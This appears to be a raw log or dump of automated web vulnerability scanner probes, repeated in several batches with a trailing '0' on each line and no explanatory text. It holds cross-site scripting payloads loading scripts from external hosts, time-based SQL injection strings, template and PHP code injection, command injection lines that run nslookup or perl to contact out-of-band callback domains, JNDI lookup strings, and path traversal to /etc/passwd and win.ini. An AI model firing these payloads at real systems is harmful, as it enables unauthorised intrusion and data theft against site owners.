1DFglNPhFrO 0
1 0
1 0
1 0
1<aQW6tSt< 0
1<img sRc='http://attacker-9992/log.php? 0
1<aI8oQ6A x=9931> 0
1<ifRAme sRc=9548.com></IfRamE> 0
1<W3AM2K>F0XSS[!+!]</W3AM2K> 0
1yP1gP <ScRiPt >UdKx(9461)</ScRiPt> 0
1}body{acu:Expre/**/SSion(UdKx(9660))} 0
<a HrEF=jaVaScRiPT:> 0
<a HrEF=http://xss.bxss.me></a> 0
1<input autofocus onfocus=UdKx(9492)> 0
�<img acu onmouseover=UdKx(96551) //�> 0
1<ScRiPt>UdKx(9867)</sCripT> 0
1\u003CScRiPt\UdKx(9026)\u003C/sCripT\u003E 0
%31%3C%53%63%52%69%50%74%20%3E%55%64%4B%78%289125%29%3C%2F%73%43%72%69%70%54%3E 0
1<img/src=">" onerror=alert(9932)> 0
1<img src=xyz OnErRor=UdKx(9552)> 0
1<img src=//xss.bxss.me/t/dot.gif onload=UdKx(9143)> 0
1<body onload=UdKx(9029)> 0
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9829'> 0
1<isindex type=image src=1 onerror=UdKx(9023)> 0
1<svg ��onload=UdKx(9934);> 0
1<�ScRiPt >UdKx(9065)</ScRiPt> 0
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9164></ScRiPt> 0
1<ScRiPt >UdKx(9577)</ScRiPt> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%55%64%4B%78%28%39%31%37%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<script>UdKx(9097)</script> 0
1<WYMNBK>HKJQP[!+!]</WYMNBK> 0
1<ScRiPt >UdKx(9564)</ScRiPt> 0
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
acx__${98991*97996}__::.x 0
acx[[${98991*97996}]]xca 0
acx{{98991*97996}}xca 0
1 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> 0
1 0
<th:t="${acx}#foreach 0
1 0
<%={{={@{#{${acx}}%> 0
acux6260%C0%BEz1%C0%BCz2a%90bcxuca6260 0
acu3430%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3430 0
19833039 0
@@FELkH 0
1�����%2527%2522 0
1'" 0
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0
QS8GrLJ8')) OR 483=(SELECT 483 FROM PG_SLEEP(15))-- 0
exePxJoV') OR 117=(SELECT 117 FROM PG_SLEEP(15))-- 0
Kab5HH5d' OR 411=(SELECT 411 FROM PG_SLEEP(15))-- 0
-1)) OR 837=(SELECT 837 FROM PG_SLEEP(15))-- 0
'"() 0
<!-- 0
'" 0
1 0
'"()&%<acx><ScRiPt >UdKx(9603)</ScRiPt> 0
-5) OR 682=(SELECT 682 FROM PG_SLEEP(15))-- 0
'.print(md5(31337)).' 0
${@print(md5(31337))}\ 0
${@print(md5(31337))} 0
";print(md5(31337));$a=" 0
';print(md5(31337));$a=' 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
1 0
1 0
1 0
1 0
"+response.write(9950264*9991316)+" 0
'+response.write(9950264*9991316)+' 0
response.write(9950264*9991316) 0
1 0
1 0
1 0
1 0
1 0
1'"()&%<acx><ScRiPt >UdKx(9451)</ScRiPt> 0
".gethostbyname(lc("hitbt"."gwpjsfzredfb1.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(80).chr(103).chr(65)." 0
'.gethostbyname(lc('hitro'.'wlmlnxxmfe748.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(90).chr(98).chr(79).' 0
1 0
;(nslookup hityhdajclsrn5a941.bxss.me||perl -e "gethostbyname('hityhdajclsrn5a941.bxss.me')")|(nslookup hityhdajclsrn5a941.bxss.me||perl -e "gethostbyname('hityhdajclsrn5a941.bxss.me')")&(nslookup hityhdajclsrn5a941.bxss.me||perl -e "gethostbyname('hityhdajclsrn5a941.bxss.me')") 0
`(nslookup hitejaqgcsdta54d84.bxss.me||perl -e "gethostbyname('hitejaqgcsdta54d84.bxss.me')")` 0
|(nslookup hitwdnyhaagiz29289.bxss.me||perl -e "gethostbyname('hitwdnyhaagiz29289.bxss.me')") 0
&(nslookup hitfuwaaypceia417c.bxss.me||perl -e "gethostbyname('hitfuwaaypceia417c.bxss.me')")&'\"`0&(nslookup hitfuwaaypceia417c.bxss.me||perl -e "gethostbyname('hitfuwaaypceia417c.bxss.me')")&`' 0
$(nslookup hitprzzkwvszh77fbe.bxss.me||perl -e "gethostbyname('hitprzzkwvszh77fbe.bxss.me')") 0
(nslookup hitzewsmfyxceae372.bxss.me||perl -e "gethostbyname('hitzewsmfyxceae372.bxss.me')") 0
|echo jrqwhm$()\ bhoujo\nz^xyu||a #' |echo jrqwhm$()\ bhoujo\nz^xyu||a #|" |echo jrqwhm$()\ bhoujo\nz^xyu||a # 0
1 0
&echo qiycnc$()\ mmsodx\nz^xyu||a #' &echo qiycnc$()\ mmsodx\nz^xyu||a #|" &echo qiycnc$()\ mmsodx\nz^xyu||a # 0
echo orvzsa$()\ rnrgrh\nz^xyu||a #' &echo orvzsa$()\ rnrgrh\nz^xyu||a #|" &echo orvzsa$()\ rnrgrh\nz^xyu||a # 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 0
1 0
-5 OR 305=(SELECT 305 FROM PG_SLEEP(15))-- 0
raqxawE7')); waitfor delay '0:0:15' -- 0
1 0
1 0
1 0
../1 0
0
1 0
../../../../../../../../../../../../../../windows/win.ini 0
PaxhlwGB'); waitfor delay '0:0:15' -- 0
2wqrmT8u'; waitfor delay '0:0:15' -- 0
1 0
1 0
1 waitfor delay '0:0:15' -- 0
-1)); waitfor delay '0:0:15' -- 0
1 0
1 0
1 0
0
1 0
1 0
1 0
-1); waitfor delay '0:0:15' -- 0
1 0
-1; waitfor delay '0:0:15' -- 0
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
if(now()=sysdate(),sleep(15),0) 0
-1" OR 2+728-728-1=0+0+0+1 -- 0
-1' OR 2+521-521-1=0+0+0+1 or 'gbBFdj6A'=' 0
-1' OR 2+786-786-1=0+0+0+1 -- 0
-1 OR 2+291-291-1=0+0+0+1 0
-1 OR 2+397-397-1=0+0+0+1 -- 0
HKYiGxxV 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
../../../../../../../../../../../../../../etc/passwd 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
^(#$!@#$)(()))****** 0
1 0
!(()&&!|*|*| 0
) 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1<esi:include src="http://bxss.me/rpb.png"/> 0
1 0
1 0
1 0
1 0
bxss.me 0
http://bxss.me/t/fit.txt%3F.jpg 0
1 0
Http://bxss.me/t/fit.txt 0
1some_inexistent_file_with_long_name%00.jpg 0
1 0
1 0
1 0
1 0
/../../../../../../../../../../windows/system32/BITSADMIN.exe 0
1 0
1 0
1 0
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
bxss.me/t/xss.html?%00 0
HttP://bxss.me/t/xss.html?%00 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1&n954531=v958058 0
1 0
/xfs.bxss.me 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
'+'A'.concat(70-3).concat(22*4).concat(100).concat(68).concat(114).concat(84)+(require'socket' Socket.gethostbyname('hitae'+'dbcwlneo10266.bxss.me.')[3].to_s)+' 0
"+"A".concat(70-3).concat(22*4).concat(110).concat(81).concat(98).concat(78)+(require"socket" Socket.gethostbyname("hitrn"+"lafvarra7637d.bxss.me.")[3].to_s)+" 0
1 0
1 0
1 0
1 0
1 0
GHkclL6O 0
1 0
1 0
1 0
1 0
1 0
1 0
${j${::-n}di:dns${::-:}//hitwluuzadmac983da${::-.}bxss.me} 0
1 0
1 0
1 0
1 0
1 0
${9999966+10000462} 0
1 0
1 0
1 0
1 0
1 0
1 0
1<afQCYjt< 0
1<img sRc='http://attacker-9616/log.php? 0
1<ai9mVTn x=9202> 0
1<ifRAme sRc=9737.com></IfRamE> 0
1<WGBUV7>CCGI8[!+!]</WGBUV7> 0
1GE1SC <ScRiPt >miWE(9104)</ScRiPt> 0
1}body{acu:Expre/**/SSion(miWE(9474))} 0
<a HrEF=jaVaScRiPT:> 0
<a HrEF=http://xss.bxss.me></a> 0
1<input autofocus onfocus=miWE(9823)> 0
�<img acu onmouseover=miWE(96641) //�> 0
1<ScRiPt>miWE(9758)</sCripT> 0
1\u003CScRiPt\miWE(9775)\u003C/sCripT\u003E 0
%31%3C%53%63%52%69%50%74%20%3E%6D%69%57%45%289332%29%3C%2F%73%43%72%69%70%54%3E 0
1<img/src=">" onerror=alert(9466)> 0
1<img src=xyz OnErRor=miWE(9851)> 0
1<img src=//xss.bxss.me/t/dot.gif onload=miWE(9508)> 0
1<body onload=miWE(9252)> 0
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9215'> 0
1<isindex type=image src=1 onerror=miWE(9517)> 0
1<svg ��onload=miWE(9574);> 0
1<�ScRiPt >miWE(9270)</ScRiPt> 0
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9848></ScRiPt> 0
1<ScRiPt >miWE(9594)</ScRiPt> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6D%69%57%45%28%39%33%33%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<script>miWE(9973)</script> 0
1<WDE41C>HEEDJ[!+!]</WDE41C> 0
1<ScRiPt >miWE(9444)</ScRiPt> 0
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
acx__${98991*97996}__::.x 0
acx[[${98991*97996}]]xca 0
acx{{98991*97996}}xca 0
1 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> 0
1 0
<th:t="${acx}#foreach 0
1 0
<%={{={@{#{${acx}}%> 0
acux5033%C0%BEz1%C0%BCz2a%90bcxuca5033 0
acu5519%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5519 0
bxss.me/t/xss.html?%00 0
HttP://bxss.me/t/xss.html?%00 0
19522087 0
1 0
1 0
@@xCf5w 0
1�����%2527%2522 0
1'" 0
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0
7C78i21A')) OR 640=(SELECT 640 FROM PG_SLEEP(15))-- 0
g03Mqopc') OR 355=(SELECT 355 FROM PG_SLEEP(15))-- 0
'"()&%<acx><ScRiPt >miWE(9608)</ScRiPt> 0
pJF6clrZ' OR 514=(SELECT 514 FROM PG_SLEEP(15))-- 0
-1)) OR 637=(SELECT 637 FROM PG_SLEEP(15))-- 0
1 0
-5) OR 972=(SELECT 972 FROM PG_SLEEP(15))-- 0
-5 OR 673=(SELECT 673 FROM PG_SLEEP(15))-- 0
1xTlKdo5')); waitfor delay '0:0:15' -- 0
x4mBNOnS'); waitfor delay '0:0:15' -- 0
1zcLz3Ek'; waitfor delay '0:0:15' -- 0
1 waitfor delay '0:0:15' -- 0
-1)); waitfor delay '0:0:15' -- 0
-1); waitfor delay '0:0:15' -- 0
-1; waitfor delay '0:0:15' -- 0
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
if(now()=sysdate(),sleep(15),0) 0
-1" OR 2+666-666-1=0+0+0+1 -- 0
-1' OR 2+364-364-1=0+0+0+1 or 'dZC60SPW'=' 0
-1' OR 2+465-465-1=0+0+0+1 -- 0
-1 OR 2+138-138-1=0+0+0+1 0
-1 OR 2+698-698-1=0+0+0+1 -- 0
9rejxV6R 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
".gethostbyname(lc("hittx"."fbhftqmq9613b.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(73).chr(104).chr(76)." 0
'.gethostbyname(lc('hitjm'.'gguptadh6bef5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(77).chr(97).chr(67).' 0
1'"()&%<acx><ScRiPt >miWE(9886)</ScRiPt> 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
"+response.write(9326099*9114407)+" 0
'+response.write(9326099*9114407)+' 0
response.write(9326099*9114407) 0
1 0
'.print(md5(31337)).' 0
${@print(md5(31337))}\ 0
/xfs.bxss.me 0
${@print(md5(31337))} 0
";print(md5(31337));$a=" 0
';print(md5(31337));$a=' 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
1 0
1 0
1 0
1 0
1 0
1 0
;(nslookup hitgjohcolryqd3e4a.bxss.me||perl -e "gethostbyname('hitgjohcolryqd3e4a.bxss.me')")|(nslookup hitgjohcolryqd3e4a.bxss.me||perl -e "gethostbyname('hitgjohcolryqd3e4a.bxss.me')")&(nslookup hitgjohcolryqd3e4a.bxss.me||perl -e "gethostbyname('hitgjohcolryqd3e4a.bxss.me')") 0
`(nslookup hitbmqmifnfutf0296.bxss.me||perl -e "gethostbyname('hitbmqmifnfutf0296.bxss.me')")` 0
|(nslookup hitprbenuvphsc888a.bxss.me||perl -e "gethostbyname('hitprbenuvphsc888a.bxss.me')") 0
&(nslookup hitmgijkwfalg14ad3.bxss.me||perl -e "gethostbyname('hitmgijkwfalg14ad3.bxss.me')")&'\"`0&(nslookup hitmgijkwfalg14ad3.bxss.me||perl -e "gethostbyname('hitmgijkwfalg14ad3.bxss.me')")&`' 0
1 0
$(nslookup hitrffqnbzlvd959d9.bxss.me||perl -e "gethostbyname('hitrffqnbzlvd959d9.bxss.me')") 0
(nslookup hitqqokzvvwxh6529f.bxss.me||perl -e "gethostbyname('hitqqokzvvwxh6529f.bxss.me')") 0
|echo nhiypc$()\ gzoxts\nz^xyu||a #' |echo nhiypc$()\ gzoxts\nz^xyu||a #|" |echo nhiypc$()\ gzoxts\nz^xyu||a # 0
&echo vjtshb$()\ xygkkv\nz^xyu||a #' &echo vjtshb$()\ xygkkv\nz^xyu||a #|" &echo vjtshb$()\ xygkkv\nz^xyu||a # 0
echo rkeyya$()\ eveozx\nz^xyu||a #' &echo rkeyya$()\ eveozx\nz^xyu||a #|" &echo rkeyya$()\ eveozx\nz^xyu||a # 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1&n937363=v946444 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
'"() 0
0
1 0
1 0
1 0
1 0
1 0
'+'A'.concat(70-3).concat(22*4).concat(109).concat(88).concat(119).concat(90)+(require'socket' Socket.gethostbyname('hittm'+'nkkojaww3dea5.bxss.me.')[3].to_s)+' 0
"+"A".concat(70-3).concat(22*4).concat(116).concat(84).concat(117).concat(75)+(require"socket" Socket.gethostbyname("hitiq"+"wixpnqvt2b63e.bxss.me.")[3].to_s)+" 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
^(#$!@#$)(()))****** 0
1 0
1 0
../1 0
1 0
${j${::-n}di:dns${::-:}//hitmqlqkfmthla4df1${::-.}bxss.me} 0
1 0
../../../../../../../../../../../../../../windows/win.ini 0
1 0
1 0
../../../../../../../../../../../../../../etc/passwd 0
1 0
1 0
!(()&&!|*|*| 0
<!-- 0
1 0
'" 0
1 0
1 0
1 0
1 0
) 0
1 0
1 0
1 0
1 0
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
bxss.me 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
/../../../../../../../../../../windows/system32/BITSADMIN.exe 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
http://bxss.me/t/fit.txt%3F.jpg 0
Http://bxss.me/t/fit.txt 0
1some_inexistent_file_with_long_name%00.jpg 0
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
${10000066+9999710} 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
AJ1hdajX 0
1 0
1 0
1 0
1<esi:include src="http://bxss.me/rpb.png"/> 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1<aLycMM4< 0
1<img sRc='http://attacker-9568/log.php? 0
1<a0FWXav x=9355> 0
1<ifRAme sRc=9323.com></IfRamE> 0
1<WRFI5Z>YDHOG[!+!]</WRFI5Z> 0
1z4PDn <ScRiPt >mTn4(9699)</ScRiPt> 0
1}body{acu:Expre/**/SSion(mTn4(9136))} 0
<a HrEF=jaVaScRiPT:> 0
<a HrEF=http://xss.bxss.me></a> 0
1<input autofocus onfocus=mTn4(9977)> 0
�<img acu onmouseover=mTn4(98631) //�> 0
1<ScRiPt>mTn4(9174)</sCripT> 0
1\u003CScRiPt\mTn4(9730)\u003C/sCripT\u003E 0
%31%3C%53%63%52%69%50%74%20%3E%6D%54%6E%34%289384%29%3C%2F%73%43%72%69%70%54%3E 0
1<img/src=">" onerror=alert(9299)> 0
1<img src=xyz OnErRor=mTn4(9575)> 0
1<img src=//xss.bxss.me/t/dot.gif onload=mTn4(9427)> 0
1<body onload=mTn4(9868)> 0
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9940'> 0
1<isindex type=image src=1 onerror=mTn4(9686)> 0
1<svg ��onload=mTn4(9696);> 0
1<�ScRiPt >mTn4(9494)</ScRiPt> 0
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9888></ScRiPt> 0
1<ScRiPt >mTn4(9153)</ScRiPt> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6D%54%6E%34%28%39%39%33%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<script>mTn4(9264)</script> 0
1<WBZXJU>LMTCD[!+!]</WBZXJU> 0
1<ScRiPt >mTn4(9479)</ScRiPt> 0
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
acx__${98991*97996}__::.x 0
acx[[${98991*97996}]]xca 0
acx{{98991*97996}}xca 0
1 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> 0
1 0
<th:t="${acx}#foreach 0
;(nslookup hituynwcpjiir8c2af.bxss.me||perl -e "gethostbyname('hituynwcpjiir8c2af.bxss.me')")|(nslookup hituynwcpjiir8c2af.bxss.me||perl -e "gethostbyname('hituynwcpjiir8c2af.bxss.me')")&(nslookup hituynwcpjiir8c2af.bxss.me||perl -e "gethostbyname('hituynwcpjiir8c2af.bxss.me')") 0
`(nslookup hityxyfptfavxe3218.bxss.me||perl -e "gethostbyname('hityxyfptfavxe3218.bxss.me')")` 0
|(nslookup hitmwebbwoasy7dab8.bxss.me||perl -e "gethostbyname('hitmwebbwoasy7dab8.bxss.me')") 0
&(nslookup hitytzhlvhdnr96e0b.bxss.me||perl -e "gethostbyname('hitytzhlvhdnr96e0b.bxss.me')")&'\"`0&(nslookup hitytzhlvhdnr96e0b.bxss.me||perl -e "gethostbyname('hitytzhlvhdnr96e0b.bxss.me')")&`' 0
$(nslookup hitehwubststa05de0.bxss.me||perl -e "gethostbyname('hitehwubststa05de0.bxss.me')") 0
(nslookup hitzkinrjlbzh91a54.bxss.me||perl -e "gethostbyname('hitzkinrjlbzh91a54.bxss.me')") 0
|echo hzocjz$()\ pvchwm\nz^xyu||a #' |echo hzocjz$()\ pvchwm\nz^xyu||a #|" |echo hzocjz$()\ pvchwm\nz^xyu||a # 0
&echo ycpcow$()\ qizfvb\nz^xyu||a #' &echo ycpcow$()\ qizfvb\nz^xyu||a #|" &echo ycpcow$()\ qizfvb\nz^xyu||a # 0
bxss.me 0
http://bxss.me/t/fit.txt%3F.jpg 0
Http://bxss.me/t/fit.txt 0
1 0
<%={{={@{#{${acx}}%> 0
echo lkztlk$()\ srklpo\nz^xyu||a #' &echo lkztlk$()\ srklpo\nz^xyu||a #|" &echo lkztlk$()\ srklpo\nz^xyu||a # 0
1 0
1 0
1 0
1some_inexistent_file_with_long_name%00.jpg 0
acux7583%C0%BEz1%C0%BCz2a%90bcxuca7583 0
1 0
1 0
1 0
@@6QAzw 0
1�����%2527%2522 0
1 0
1'" 0
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0
U3kWT3ts')) OR 797=(SELECT 797 FROM PG_SLEEP(15))-- 0
88rQ1wBS') OR 522=(SELECT 522 FROM PG_SLEEP(15))-- 0
flSbZNrR' OR 65=(SELECT 65 FROM PG_SLEEP(15))-- 0
-1)) OR 353=(SELECT 353 FROM PG_SLEEP(15))-- 0
-5) OR 349=(SELECT 349 FROM PG_SLEEP(15))-- 0
-5 OR 65=(SELECT 65 FROM PG_SLEEP(15))-- 0
NBdetqw1')); waitfor delay '0:0:15' -- 0
acu3189%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3189 0
apIAr5YP'); waitfor delay '0:0:15' -- 0
eTVmy8mc'; waitfor delay '0:0:15' -- 0
1 waitfor delay '0:0:15' -- 0
-1)); waitfor delay '0:0:15' -- 0
1 0
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg 0
1 0
1 0
1 0
-1); waitfor delay '0:0:15' -- 0
-1; waitfor delay '0:0:15' -- 0
1 0
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 0
if(now()=sysdate(),sleep(15),0) 0
-1" OR 2+161-161-1=0+0+0+1 -- 0
-1' OR 2+619-619-1=0+0+0+1 or 'iXQpzEK7'=' 0
-1' OR 2+577-577-1=0+0+0+1 -- 0
-1 OR 2+562-562-1=0+0+0+1 0
-1 OR 2+905-905-1=0+0+0+1 -- 0
pjfKGX1z 0
1 0
19643601 0
'"()&%<acx><ScRiPt >mTn4(9689)</ScRiPt> 0
1 0
1 0
1 0
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 0
1 0
1 0
1'"()&%<acx><ScRiPt >mTn4(9907)</ScRiPt> 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
0
1 0
^(#$!@#$)(()))****** 0
1 0
llN6vry2 0
1 0
!(()&&!|*|*| 0
1&n967771=v915605 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
) 0
1 0
../1 0
1 0
../../../../../../../../../../../../../../windows/win.ini 0
../../../../../../../../../../../../../../etc/passwd 0
1 0
1 0
1 0
".gethostbyname(lc("hitsh"."hdjsjatv2618e.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(87).chr(116).chr(82)." 0
'.gethostbyname(lc('hiths'.'nehysxqjd2e07.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(83).chr(112).chr(86).' 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
${j${::-n}di:dns${::-:}//hitfaagoyzpim1764f${::-.}bxss.me} 0
bxss.me/t/xss.html?%00 0
/../../../../../../../../../../windows/system32/BITSADMIN.exe 0
"+response.write(9852094*9638070)+" 0
<!-- 0
'+response.write(9852094*9638070)+' 0
response.write(9852094*9638070) 0
1 0
1 0
1 0
1 0
HttP://bxss.me/t/xss.html?%00 0
1 0
'"() 0
0
1 0
1 0
1<esi:include src="http://bxss.me/rpb.png"/> 0
'" 0
1 0
1 0
'.print(md5(31337)).' 0
${@print(md5(31337))}\ 0
${@print(md5(31337))} 0
";print(md5(31337));$a=" 0
1 0
1 0
1 0
';print(md5(31337));$a=' 0
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 0
1 0
1 0
1 0
1 0
1 0
/xfs.bxss.me 0
1 0
1 0
1 0
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 0
1 0
1 0
1 0
'+'A'.concat(70-3).concat(22*4).concat(103).concat(87).concat(122).concat(75)+(require'socket' Socket.gethostbyname('hityx'+'awexbszk1c369.bxss.me.')[3].to_s)+' 0
"+"A".concat(70-3).concat(22*4).concat(102).concat(66).concat(122).concat(89)+(require"socket" Socket.gethostbyname("hitom"+"vkqwzwta53fa0.bxss.me.")[3].to_s)+" 0
1 0
1 0
1 0
1 0
1 0
${9999803+10000130} 0
1 0
1 0
1 0
1 0
1 0
1 0
1 0
1<aWhERwm< 0
1<img sRc='http://attacker-9674/log.php? 0
1<aH6XMZk x=9851> 0
1<ifRAme sRc=9304.com></IfRamE> 0
1<WUV2AI>BIJMM[!+!]</WUV2AI> 0
1p1GnS <ScRiPt >f3td(9436)</ScRiPt> 0
1}body{acu:Expre/**/SSion(f3td(9280))} 0
<a HrEF=jaVaScRiPT:> 0
<a HrEF=http://xss.bxss.me></a> 0
1<input autofocus onfocus=f3td(9101)> 0
�<img acu onmouseover=f3td(93861) //�> 0
1<ScRiPt>f3td(9997)</sCripT> 0
1\u003CScRiPt\f3td(9321)\u003C/sCripT\u003E 0
%31%3C%53%63%52%69%50%74%20%3E%66%33%74%64%289439%29%3C%2F%73%43%72%69%70%54%3E 0
1<img/src=">" onerror=alert(9691)> 0
1<img src=xyz OnErRor=f3td(9950)> 0
1<img src=//xss.bxss.me/t/dot.gif onload=f3td(9303)> 0
1<body onload=f3td(9763)> 0
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9570'> 0
1<isindex type=image src=1 onerror=f3td(9098)> 0
1<svg ��onload=f3td(9555);> 0
1<�ScRiPt >f3td(9487)</ScRiPt> 0
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9020></ScRiPt> 0
1<ScRiPt >f3td(9924)</ScRiPt> 0
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%66%33%74%64%28%39%32%31%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E 0
1<script>f3td(9596)</script> 0
1<WZ0051>5OU2C[!+!]</WZ0051> 0
1<ScRiPt >f3td(9961)</ScRiPt> 0
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") 0
acx__${98991*97996}__::.x 0
acx[[${98991*97996}]]xca 0
acx{{98991*97996}}xca 0
1 0
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> 0
1 0
<th:t="${acx}#foreach 0
1 0
1 0
1 0
@@6kplT 0
1�����%2527%2522 0
<%={{={@{#{${acx}}%> 0
acux10039%C0%BEz1%C0%BCz2a%90bcxuca10039 0
1'" 0
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 0
acu2071%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2071 0
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) 0
9maPwoeu')) OR 760=(SELECT 760 FROM PG_SLEEP(15))-- 0
IlRwm9l6') OR 642=(SELECT 642 FROM PG_SLEEP(15))-- 0
GDk8tzoB' OR 400=(SELECT 400 FROM PG_SLEEP(15))-- 0
-1)) OR 324=(SELECT 324 FROM PG_SLEEP(15))-- 0
-5) OR 15=(SELECT 15 FROM PG_SLEEP(15))-- 0
-5 OR 903=(SELECT 903 FROM PG_SLEEP(15))-- 0
udb7bfW2')); waitfor delay '0:0:15' -- 0
XPDgSN3F'); waitfor delay '0:0:15' -- 0
